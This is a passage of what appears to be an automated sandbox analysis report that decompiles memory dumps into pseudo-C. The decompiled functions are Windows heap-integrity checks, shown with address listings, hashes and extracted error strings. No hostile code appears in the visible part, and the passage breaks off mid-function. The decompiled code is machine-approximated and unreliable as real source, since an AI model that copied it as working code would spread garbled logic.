                                                												if(_t307 == 0) {
                                                													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                													L60:
                                                													_t94 = _t415 + 8; // -16
                                                													E013DE4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                													goto L61;
                                                												}
                                                												_t405 = _t307;
                                                											}
                                                											_t309 = _t380;
                                                											goto L60;
                                                										}
                                                									} else {
                                                										_t407 =  *(_t414 + 0x4c);
                                                										while(1) {
                                                											__eflags = _t407;
                                                											if(_t407 == 0) {
                                                												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                											} else {
                                                												_t315 =  *(_t378 - 8);
                                                												_t407 =  *(_t414 + 0x4c);
                                                												__eflags = _t315 & _t407;
                                                												if((_t315 & _t407) != 0) {
                                                													_t315 = _t315 ^  *(_t414 + 0x50);
                                                													__eflags = _t315;
                                                												}
                                                												_t312 = _t315 & 0x0000ffff;
                                                											}
                                                											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                												goto L51;
                                                											}
                                                											_t378 =  *_t378;
                                                											__eflags = _t414 + 0xc0 - _t378;
                                                											if(_t414 + 0xc0 != _t378) {
                                                												continue;
                                                											}
                                                											goto L51;
                                                										}
                                                										goto L51;
                                                									}
                                                								}
                                                								_t317 = E013DA229(_t414, _t415);
                                                								__eflags = _t317;
                                                								if(_t317 != 0) {
                                                									goto L39;
                                                								}
                                                								E013DA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                								goto L86;
                                                							}
                                                							_t385 =  *_t415 & 0x0000ffff;
                                                							while(1) {
                                                								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                									break;
                                                								}
                                                								_t320 =  *_t402;
                                                								__eflags = _t320;
                                                								if(_t320 == 0) {
                                                									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                									L34:
                                                									_t63 = _t415 + 8; // -16
                                                									E013DBC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                									_t374 = _v24;
                                                									goto L35;
                                                								}
                                                								_t402 = _t320;
                                                							}
                                                							_t322 = _t385;
                                                							goto L34;
                                                						}
                                                					}
                                                					if(_a20 == 0) {
                                                						L18:
                                                						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                							goto L67;
                                                						}
                                                						if(E014623E3(_t414, _t415) == 0) {
                                                							goto L117;
                                                						}
                                                						goto L67;
                                                					} else {
                                                						if((_t390 & 0x00000002) == 0) {
                                                							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                						} else {
                                                							_t328 = E013B1F5B(_t415);
                                                							_t342 = _v20;
                                                							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                						}
                                                						_t429 = _t326;
                                                						if(_t429 == 0) {
                                                							goto L18;
                                                						}
                                                						if(_t429 >= 0) {
                                                							__eflags = _t326 & 0x00000800;
                                                							if(__eflags != 0) {
                                                								goto L18;
                                                							}
                                                							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                							if(__eflags >= 0) {
                                                								goto L18;
                                                							}
                                                							_t412 = _a20;
                                                							_t327 = _t326 & 0x0000ffff;
                                                							L17:
                                                							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                							goto L18;
                                                						}
                                                						_t327 = _t326 & 0x00007fff;
                                                						if(_t327 >= 0x81) {
                                                							goto L18;
                                                						}
                                                						_t412 = _a24;
                                                						goto L17;
                                                					}
                                                					L86:
                                                				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                				_t189 = _v12;
                                                				goto L88;
                                                			}



































































                                                0x0147509d
                                                0x01474b58
                                                0x01474b5b
                                                0x01474b5e
                                                0x01474b63
                                                0x01474b66
                                                0x01474b69
                                                0x01474b6f
                                                0x01474be4
                                                0x01474bf0
                                                0x01474bf2
                                                0x01474bf5
                                                0x01474dc3
                                                0x01474dc6
                                                0x01474dc9
                                                0x01474dce
                                                0x01474dce
                                                0x01474dd0
                                                0x01474dd0
                                                0x01474dd5
                                                0x01474def
                                                0x01474dd7
                                                0x01474de7
                                                0x01474de7
                                                0x01474df3
                                                0x01475001
                                                0x01475007
                                                0x0147500b
                                                0x0147502a
                                                0x0147502f
                                                0x0147500d
                                                0x01475022
                                                0x01475027
                                                0x01475039
                                                0x0147503a
                                                0x0147503b
                                                0x00000000
                                                0x01474df9
                                                0x01474dfd
                                                0x01474e90
                                                0x01474e94
                                                0x01474e9e
                                                0x01474ea4
                                                0x01474ea4
                                                0x01474ea4
                                                0x01474ea6
                                                0x01474ea6
                                                0x00000000
                                                0x01474ea6
                                                0x01474e03
                                                0x01474e08
                                                0x01474f88
                                                0x01474f92
                                                0x01474f99
                                                0x01474f9c
                                                0x01474fe0
                                                0x01474fe4
                                                0x01474fee
                                                0x01474ff4
                                                0x01474ff4
                                                0x01474ff4
                                                0x00000000
                                                0x01474fe4
                                                0x01474f9e
                                                0x01474fa4
                                                0x01474fa8
                                                0x01474fc7
                                                0x01474fcc
                                                0x01474faa
                                                0x01474fbf
                                                0x01474fc4
                                                0x01474fd2
                                                0x01474fd5
                                                0x01474fd6
                                                0x01474f34
                                                0x01474f34
                                                0x00000000
                                                0x01474f39
                                                0x01474e0e
                                                0x01474e14
                                                0x01474e1b
                                                0x01474e25
                                                0x01474e2b
                                                0x01474e2b
                                                0x01474e33
                                                0x01474e38
                                                0x01474e8a
                                                0x01474e8a
                                                0x00000000
                                                0x01474e3a
                                                0x01474e3e
                                                0x01474e43
                                                0x01474e47
                                                0x01474e53
                                                0x01474e58
                                                0x01474e5a
                                                0x01474e5c
                                                0x01474e61
                                                0x01474e61
                                                0x01474e5a
                                                0x01474e6e
                                                0x01474f41
                                                0x01474f47
                                                0x01474f4b
                                                0x01474f6a
                                                0x01474f6f
                                                0x01474f4d
                                                0x01474f62
                                                0x01474f67
                                                0x01474f7f
                                                0x01474f80
                                                0x01474f81
                                                0x00000000
                                                0x01474e74
                                                0x01474e78
                                                0x01474e82
                                                0x01474e88
                                                0x01474e88
                                                0x00000000
                                                0x01474e78
                                                0x01474e6e
                                                0x01474e38
                                                0x01474df3
                                                0x01474bfe
                                                0x01474c01
                                                0x01474c04
                                                0x01474c07
                                                0x01474c09
                                                0x01474c0c
                                                0x01474c0e
                                                0x01474c0e
                                                0x01474c11
                                                0x01474c11
                                                0x01474c0c
                                                0x01474c14
                                                0x01474c17
                                                0x01474dae
                                                0x01474db2
                                                0x01474db7
                                                0x01474dba
                                                0x01474dbd
                                                0x01474ef1
                                                0x01474ef7
                                                0x01474efb
                                                0x01474f1a
                                                0x01474f1f
                                                0x01474efd
                                                0x01474f12
                                                0x01474f17
                                                0x01474f2b
                                                0x01474f2b
                                                0x01474f2d
                                                0x01474f2e
                                                0x01474f2f
                                                0x00000000
                                                0x01474f2f
                                                0x00000000
                                                0x01474c1d
                                                0x01474c1d
                                                0x01474c20
                                                0x01474c23
                                                0x01474c26
                                                0x01474c29
                                                0x01474c2c
                                                0x01474c2e
                                                0x01474d91
                                                0x01474d91
                                                0x01474d92
                                                0x01474d97
                                                0x01474d9e
                                                0x00000000
                                                0x01474d9e
                                                0x01474c34
                                                0x01474c37
                                                0x01474c39
                                                0x01474c3c
                                                0x00000000
                                                0x00000000
                                                0x01474c45
                                                0x01474c48
                                                0x01474c4e
                                                0x01474c50
                                                0x01474c78
                                                0x01474c78
                                                0x01474c7b
                                                0x01474c7d
                                                0x01474c80
                                                0x01474c84
                                                0x01474cad
                                                0x01474cad
                                                0x01474cb0
                                                0x01474cb8
                                                0x01474cbb
                                                0x01474cbe
                                                0x01474cc1
                                                0x01474cc7
                                                0x01474cdc
                                                0x01474cc9
                                                0x01474cd2
                                                0x01474cd4
                                                0x01474cd4
                                                0x01474cde
                                                0x01474ce0
                                                0x01474d13
                                                0x01474d13
                                                0x01474d16
                                                0x01474d18
                                                0x01474d29
                                                0x01474d2a
                                                0x01474d2c
                                                0x01474d34
                                                0x01474d1a
                                                0x01474d1a
                                                0x01474d1a
                                                0x01474d1d
                                                0x01474d1f
                                                0x01474d22
                                                0x01474d24
                                                0x01474d24
                                                0x01474d3c
                                                0x01474d3f
                                                0x01474d45
                                                0x01474d47
                                                0x01474d6c
                                                0x01474d6c
                                                0x01474d70
                                                0x01474d7e
                                                0x01474d84
                                                0x01474d84
                                                0x00000000
                                                0x01474d49
                                                0x01474d49
                                                0x01474d56
                                                0x01474d56
                                                0x01474d59
                                                0x00000000
                                                0x00000000
                                                0x01474d4e
                                                0x01474d50
                                                0x01474d52
                                                0x01474d8e
                                                0x01474d5d
                                                0x01474d5f
                                                0x01474d67
                                                0x00000000
                                                0x01474d67
                                                0x01474d54
                                                0x01474d54
                                                0x01474d5b
                                                0x00000000
                                                0x01474d5b
                                                0x01474ce2
                                                0x01474ce2
                                                0x01474ce5
                                                0x01474ce5
                                                0x01474ce7
                                                0x01474cfb
                                                0x01474ce9
                                                0x01474ce9
                                                0x01474cec
                                                0x01474cef
                                                0x01474cf1
                                                0x01474cf3
                                                0x01474cf3
                                                0x01474cf3
                                                0x01474cf6
                                                0x01474cf6
                                                0x01474d02
                                                0x01474d05
                                                0x00000000
                                                0x00000000
                                                0x01474d07
                                                0x01474d0f
                                                0x01474d11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01474d11
                                                0x00000000
                                                0x01474ce5
                                                0x01474ce0
                                                0x01474c8a
                                                0x01474c8f
                                                0x01474c91
                                                0x00000000
                                                0x00000000
                                                0x01474c9d
                                                0x00000000
                                                0x01474c9d
                                                0x01474c52
                                                0x01474c5f
                                                0x01474c5f
                                                0x01474c62
                                                0x00000000
                                                0x00000000
                                                0x01474c57
                                                0x01474c59
                                                0x01474c5b
                                                0x01474caa
                                                0x01474c66
                                                0x01474c68
                                                0x01474c70
                                                0x01474c75
                                                0x00000000
                                                0x01474c75
                                                0x01474c5d
                                                0x01474c5d
                                                0x01474c64
                                                0x00000000
                                                0x01474c64
                                                0x01474c17
                                                0x01474b75
                                                0x01474bc4
                                                0x01474bc8
                                                0x00000000
                                                0x00000000
                                                0x01474bd9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01474b77
                                                0x01474b7a
                                                0x01474b8c
                                                0x01474b7c
                                                0x01474b7e
                                                0x01474b83
                                                0x01474b86
                                                0x01474b86
                                                0x01474b90
                                                0x01474b93
                                                0x00000000
                                                0x00000000
                                                0x01474b95
                                                0x01474bab
                                                0x01474bb0
                                                0x00000000
                                                0x00000000
                                                0x01474bb2
                                                0x01474bb9
                                                0x00000000
                                                0x00000000
                                                0x01474bbb
                                                0x01474bbe
                                                0x01474bc1
                                                0x01474bc1
                                                0x00000000
                                                0x01474bc1
                                                0x01474b97
                                                0x01474ba4
                                                0x00000000
                                                0x00000000
                                                0x01474ba6
                                                0x00000000
                                                0x01474ba6
                                                0x01474ea9
                                                0x01474ea9
                                                0x01474eb2
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 193612466a11511d7bb24c9291de3c2487ee650e16ef4260235928ef534bd244
                                                • Instruction ID: f1dd96b82db896329b61e292c9a7c2b1d028bc0de8f6dda4769c1fa4f4200a04
                                                • Opcode Fuzzy Hash: 193612466a11511d7bb24c9291de3c2487ee650e16ef4260235928ef534bd244
                                                • Instruction Fuzzy Hash: E312CE702006429FEB25CF69C495BFBBBF5EF08314F18845AE5868B7A1D774E881CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 56%
                                                			E01474496(signed int* __ecx, void* __edx) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed char _v24;
                                                				signed int* _v28;
                                                				char _v32;
                                                				signed int* _v36;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t150;
                                                				intOrPtr _t151;
                                                				signed char _t156;
                                                				intOrPtr _t157;
                                                				unsigned int _t169;
                                                				intOrPtr _t170;
                                                				signed int* _t183;
                                                				signed char _t184;
                                                				intOrPtr _t191;
                                                				signed int _t201;
                                                				intOrPtr _t203;
                                                				intOrPtr _t212;
                                                				intOrPtr _t220;
                                                				signed int _t230;
                                                				signed int _t241;
                                                				signed int _t244;
                                                				void* _t259;
                                                				signed int _t260;
                                                				signed int* _t261;
                                                				intOrPtr* _t262;
                                                				signed int _t263;
                                                				signed int* _t264;
                                                				signed int _t267;
                                                				signed int* _t268;
                                                				void* _t270;
                                                				void* _t281;
                                                				signed short _t285;
                                                				signed short _t289;
                                                				signed int _t291;
                                                				signed int _t298;
                                                				signed char _t303;
                                                				signed char _t308;
                                                				signed int _t314;
                                                				intOrPtr _t317;
                                                				unsigned int _t319;
                                                				signed int* _t325;
                                                				signed int _t326;
                                                				signed int _t327;
                                                				intOrPtr _t328;
                                                				signed int _t329;
                                                				signed int _t330;
                                                				signed int* _t331;
                                                				signed int _t332;
                                                				signed int _t350;
                                                
                                                				_t259 = __edx;
                                                				_t331 = __ecx;
                                                				_v28 = __ecx;
                                                				_v20 = 0;
                                                				_v12 = 0;
                                                				_t150 = E014749A4(__ecx);
                                                				_t267 = 1;
                                                				if(_t150 == 0) {
                                                					L61:
                                                					_t151 =  *[fs:0x30];
                                                					__eflags =  *((char*)(_t151 + 2));
                                                					if( *((char*)(_t151 + 2)) != 0) {
                                                						 *0x14a6378 = _t267;
                                                						asm("int3");
                                                						 *0x14a6378 = 0;
                                                					}
                                                					__eflags = _v12;
                                                					if(_v12 != 0) {
                                                						_t105 =  &_v16;
                                                						 *_t105 = _v16 & 0x00000000;
                                                						__eflags =  *_t105;
                                                						E013E174B( &_v12,  &_v16, 0x8000);
                                                					}
                                                					L65:
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                                					_t268 =  &(_t331[0x30]);
                                                					_v32 = 0;
                                                					_t260 =  *_t268;
                                                					_t308 = 0;
                                                					_v24 = 0;
                                                					while(_t268 != _t260) {
                                                						_t260 =  *_t260;
                                                						_v16 =  *_t325 & 0x0000ffff;
                                                						_t156 = _t325[0];
                                                						_v28 = _t325;
                                                						_v5 = _t156;
                                                						__eflags = _t156 & 0x00000001;
                                                						if((_t156 & 0x00000001) != 0) {
                                                							_t157 =  *[fs:0x30];
                                                							__eflags =  *(_t157 + 0xc);
                                                							if( *(_t157 + 0xc) == 0) {
                                                								_push("HEAP: ");
                                                								E013BB150();
                                                							} else {
                                                								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                							}
                                                							_push(_t325);
                                                							E013BB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                                							L32:
                                                							_t270 = 0;
                                                							__eflags = _t331[0x13];
                                                							if(_t331[0x13] != 0) {
                                                								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                                								 *_t325 =  *_t325 ^ _t331[0x14];
                                                							}
                                                							L60:
                                                							_t267 = _t270 + 1;
                                                							__eflags = _t267;
                                                							goto L61;
                                                						}
                                                						_t169 =  *_t325 & 0x0000ffff;
                                                						__eflags = _t169 - _t308;
                                                						if(_t169 < _t308) {
                                                							_t170 =  *[fs:0x30];
                                                							__eflags =  *(_t170 + 0xc);
                                                							if( *(_t170 + 0xc) == 0) {
                                                								_push("HEAP: ");
                                                								E013BB150();
                                                							} else {
                                                								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                							}
                                                							E013BB150("Non-Dedicated free list element %p is out of order\n", _t325);
                                                							goto L32;
                                                						} else {
                                                							__eflags = _t331[0x13];
                                                							_t308 = _t169;
                                                							_v24 = _t308;
                                                							if(_t331[0x13] != 0) {
                                                								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                                								 *_t325 =  *_t325 ^ _t331[0x14];
                                                								__eflags =  *_t325;
                                                							}
                                                							_t26 =  &_v32;
                                                							 *_t26 = _v32 + 1;
                                                							__eflags =  *_t26;
                                                							continue;
                                                						}
                                                					}
                                                					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                                					if( *0x14a6350 != 0 && _t331[0x2f] != 0) {
                                                						_push(4);
                                                						_push(0x1000);
                                                						_push( &_v16);
                                                						_push(0);
                                                						_push( &_v12);
                                                						_push(0xffffffff);
                                                						if(E013F9660() >= 0) {
                                                							_v20 = _v12 + 0x204;
                                                						}
                                                					}
                                                					_t183 =  &(_t331[0x27]);
                                                					_t281 = 0x81;
                                                					_t326 =  *_t183;
                                                					if(_t183 == _t326) {
                                                						L49:
                                                						_t261 =  &(_t331[0x29]);
                                                						_t184 = 0;
                                                						_t327 =  *_t261;
                                                						_t282 = 0;
                                                						_v24 = 0;
                                                						_v36 = 0;
                                                						__eflags = _t327 - _t261;
                                                						if(_t327 == _t261) {
                                                							L53:
                                                							_t328 = _v32;
                                                							_v28 = _t331;
                                                							__eflags = _t328 - _t184;
                                                							if(_t328 == _t184) {
                                                								__eflags = _t331[0x1d] - _t282;
                                                								if(_t331[0x1d] == _t282) {
                                                									__eflags = _v12;
                                                									if(_v12 == 0) {
                                                										L82:
                                                										_t267 = 1;
                                                										__eflags = 1;
                                                										goto L83;
                                                									}
                                                									_t329 = _t331[0x2f];
                                                									__eflags = _t329;
                                                									if(_t329 == 0) {
                                                										L77:
                                                										_t330 = _t331[0x22];
                                                										__eflags = _t330;
                                                										if(_t330 == 0) {
                                                											L81:
                                                											_t129 =  &_v16;
                                                											 *_t129 = _v16 & 0x00000000;
                                                											__eflags =  *_t129;
                                                											E013E174B( &_v12,  &_v16, 0x8000);
                                                											goto L82;
                                                										}
                                                										_t314 = _t331[0x21] & 0x0000ffff;
                                                										_t285 = 1;
                                                										__eflags = 1 - _t314;
                                                										if(1 >= _t314) {
                                                											goto L81;
                                                										} else {
                                                											goto L79;
                                                										}
                                                										while(1) {
                                                											L79:
                                                											_t330 = _t330 + 0x40;
                                                											_t332 = _t285 & 0x0000ffff;
                                                											_t262 = _v20 + _t332 * 4;
                                                											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                                											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                                												break;
                                                											}
                                                											_t285 = _t285 + 1;
                                                											__eflags = _t285 - _t314;
                                                											if(_t285 < _t314) {
                                                												continue;
                                                											}
                                                											goto L81;
                                                										}
                                                										_t191 =  *[fs:0x30];
                                                										__eflags =  *(_t191 + 0xc);
                                                										if( *(_t191 + 0xc) == 0) {
                                                											_push("HEAP: ");
                                                											E013BB150();
                                                										} else {
                                                											E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                										}
                                                										_push(_t262);
                                                										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                                										_t148 = _t330 + 0x10; // 0x10
                                                										_push( *((intOrPtr*)(_t330 + 8)));
                                                										E013BB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                                										L59:
                                                										_t270 = 0;
                                                										__eflags = 0;
                                                										goto L60;
                                                									}
                                                									_t289 = 1;
                                                									__eflags = 1;
                                                									while(1) {
                                                										_t201 = _v12;
                                                										_t329 = _t329 + 0xc;
                                                										_t263 = _t289 & 0x0000ffff;
                                                										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                                										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                                											break;
                                                										}
                                                										_t289 = _t289 + 1;
                                                										__eflags = _t289 - 0x81;
                                                										if(_t289 < 0x81) {
                                                											continue;
                                                										}
                                                										goto L77;
                                                									}
                                                									_t203 =  *[fs:0x30];
                                                									__eflags =  *(_t203 + 0xc);
                                                									if( *(_t203 + 0xc) == 0) {
                                                										_push("HEAP: ");
                                                										E013BB150();
                                                									} else {
                                                										E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                									}
                                                									_t291 = _v12;
                                                									_push(_t291 + _t263 * 4);
                                                									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                                									_push( *((intOrPtr*)(_t329 + 8)));
                                                									E013BB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                                									goto L59;
                                                								}
                                                								_t212 =  *[fs:0x30];
                                                								__eflags =  *(_t212 + 0xc);
                                                								if( *(_t212 + 0xc) == 0) {
                                                									_push("HEAP: ");
                                                									E013BB150();
                                                								} else {
                                                									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                								}
                                                								_push(_t331[0x1d]);
                                                								_push(_v36);
                                                								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                                								L58:
                                                								E013BB150();
                                                								goto L59;
                                                							}
                                                							_t220 =  *[fs:0x30];
                                                							__eflags =  *(_t220 + 0xc);
                                                							if( *(_t220 + 0xc) == 0) {
                                                								_push("HEAP: ");
                                                								E013BB150();
                                                							} else {
                                                								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                							}
                                                							_push(_t328);
                                                							_push(_v24);
                                                							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                							goto L58;
                                                						} else {
                                                							goto L50;
                                                						}
                                                						while(1) {
                                                							L50:
                                                							_t92 = _t327 - 0x10; // -24
                                                							_t282 = _t331;
                                                							_t230 = E01474AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                                							__eflags = _t230;
                                                							if(_t230 == 0) {
                                                								goto L59;
                                                							}
                                                							_t327 =  *_t327;
                                                							__eflags = _t327 - _t261;
                                                							if(_t327 != _t261) {
                                                								continue;
                                                							}
                                                							_t184 = _v24;
                                                							_t282 = _v36;
                                                							goto L53;
                                                						}
                                                						goto L59;
                                                					} else {
                                                						while(1) {
                                                							_t39 = _t326 + 0x18; // 0x10
                                                							_t264 = _t39;
                                                							if(_t331[0x13] != 0) {
                                                								_t319 = _t331[0x14] ^  *_t264;
                                                								 *_t264 = _t319;
                                                								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                                								_t348 = _t319 >> 0x18 - _t303;
                                                								if(_t319 >> 0x18 != _t303) {
                                                									_push(_t303);
                                                									E0146FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                                								}
                                                								_t281 = 0x81;
                                                							}
                                                							_t317 = _v20;
                                                							if(_t317 != 0) {
                                                								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                                								_t350 = _t241;
                                                								if(_t350 != 0) {
                                                									if(_t350 >= 0) {
                                                										__eflags = _t241 & 0x00000800;
                                                										if(__eflags == 0) {
                                                											__eflags = _t241 - _t331[0x21];
                                                											if(__eflags < 0) {
                                                												_t298 = _t241;
                                                												_t65 = _t317 + _t298 * 4;
                                                												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                                												__eflags =  *_t65;
                                                											}
                                                										}
                                                									} else {
                                                										_t244 = _t241 & 0x00007fff;
                                                										if(_t244 < _t281) {
                                                											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                                										}
                                                									}
                                                								}
                                                							}
                                                							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E014623E3(_t331, _t264) == 0) {
                                                								break;
                                                							}
                                                							if(_t331[0x13] != 0) {
                                                								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                                								 *_t264 =  *_t264 ^ _t331[0x14];
                                                							}
                                                							_t326 =  *_t326;
                                                							if( &(_t331[0x27]) == _t326) {
                                                								goto L49;
                                                							} else {
                                                								_t281 = 0x81;
                                                								continue;
                                                							}
                                                						}
                                                						__eflags = _t331[0x13];
                                                						if(_t331[0x13] != 0) {
                                                							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                                							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                                						}
                                                						goto L65;
                                                					}
                                                				} else {
                                                					L83:
                                                					return _t267;
                                                				}
                                                 			}
                                                0x00000000
                                                0x014748a6
                                                0x014748fb
                                                0x01474901
                                                0x01474905
                                                0x01474924
                                                0x01474929
                                                0x01474907
                                                0x0147491c
                                                0x01474921
                                                0x0147492f
                                                0x01474935
                                                0x01474936
                                                0x01474939
                                                0x01474942
                                                0x00000000
                                                0x01474947
                                                0x01474835
                                                0x0147483b
                                                0x0147483f
                                                0x0147485e
                                                0x01474863
                                                0x01474841
                                                0x01474856
                                                0x0147485b
                                                0x01474869
                                                0x0147486c
                                                0x0147486f
                                                0x014747e7
                                                0x014747e7
                                                0x00000000
                                                0x014747ec
                                                0x014747aa
                                                0x014747b0
                                                0x014747b4
                                                0x014747d3
                                                0x014747d8
                                                0x014747b6
                                                0x014747cb
                                                0x014747d0
                                                0x014747de
                                                0x014747df
                                                0x014747e2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0147476f
                                                0x0147476f
                                                0x01474778
                                                0x01474785
                                                0x01474787
                                                0x0147478c
                                                0x0147478e
                                                0x00000000
                                                0x00000000
                                                0x01474790
                                                0x01474792
                                                0x01474794
                                                0x00000000
                                                0x00000000
                                                0x01474796
                                                0x01474799
                                                0x00000000
                                                0x01474799
                                                0x00000000
                                                0x014745c3
                                                0x014745c3
                                                0x014745c7
                                                0x014745c7
                                                0x014745ca
                                                0x014745cf
                                                0x014745d3
                                                0x014745df
                                                0x014745e4
                                                0x014745e6
                                                0x014745e8
                                                0x014745ed
                                                0x014745ed
                                                0x014745f2
                                                0x014745f2
                                                0x014745f7
                                                0x014745fc
                                                0x01474602
                                                0x01474606
                                                0x01474609
                                                0x0147460f
                                                0x014746de
                                                0x014746e3
                                                0x014746e5
                                                0x014746ec
                                                0x014746ee
                                                0x014746f6
                                                0x014746f6
                                                0x014746f6
                                                0x014746f6
                                                0x014746ec
                                                0x01474615
                                                0x01474615
                                                0x0147461d
                                                0x0147462e
                                                0x0147462e
                                                0x0147461d
                                                0x0147460f
                                                0x01474609
                                                0x014746fd
                                                0x00000000
                                                0x00000000
                                                0x01474710
                                                0x0147471a
                                                0x01474720
                                                0x01474720
                                                0x01474722
                                                0x0147472c
                                                0x00000000
                                                0x0147472e
                                                0x0147472e
                                                0x00000000
                                                0x0147472e
                                                0x0147472c
                                                0x01474738
                                                0x0147473c
                                                0x0147474b
                                                0x01474751
                                                0x01474751
                                                0x00000000
                                                0x0147473c
                                                0x014748f4
                                                0x014748f4
                                                0x00000000
                                                0x014748f4

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                • API String ID: 0-1357697941
                                                • Opcode ID: cc4c81a88f3e786865839ff618934fba786f2eac7d42016d3ef0a0220b82fb0b
                                                • Instruction ID: 46d69d122e775266ed47546f862bd8541bcb41f943ea61f56aae308b443228b8
                                                • Opcode Fuzzy Hash: cc4c81a88f3e786865839ff618934fba786f2eac7d42016d3ef0a0220b82fb0b
                                                • Instruction Fuzzy Hash: 31F1FF75600646DFDB25CBA9C480BFAFBF9FF09308F09801AE24697761D734A946CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E013DA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                                				char _v8;
                                                				signed short _v12;
                                                				signed short _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed short _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				unsigned int _v52;
                                                				signed int _v56;
                                                				void* _v60;
                                                				intOrPtr _v64;
                                                				void* _v72;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __ebp;
                                                				unsigned int _t246;
                                                				signed char _t247;
                                                				signed short _t249;
                                                				unsigned int _t256;
                                                				signed int _t262;
                                                				signed int _t265;
                                                				signed int _t266;
                                                				signed int _t267;
                                                				intOrPtr _t270;
                                                				signed int _t280;
                                                				signed int _t286;
                                                				signed int _t289;
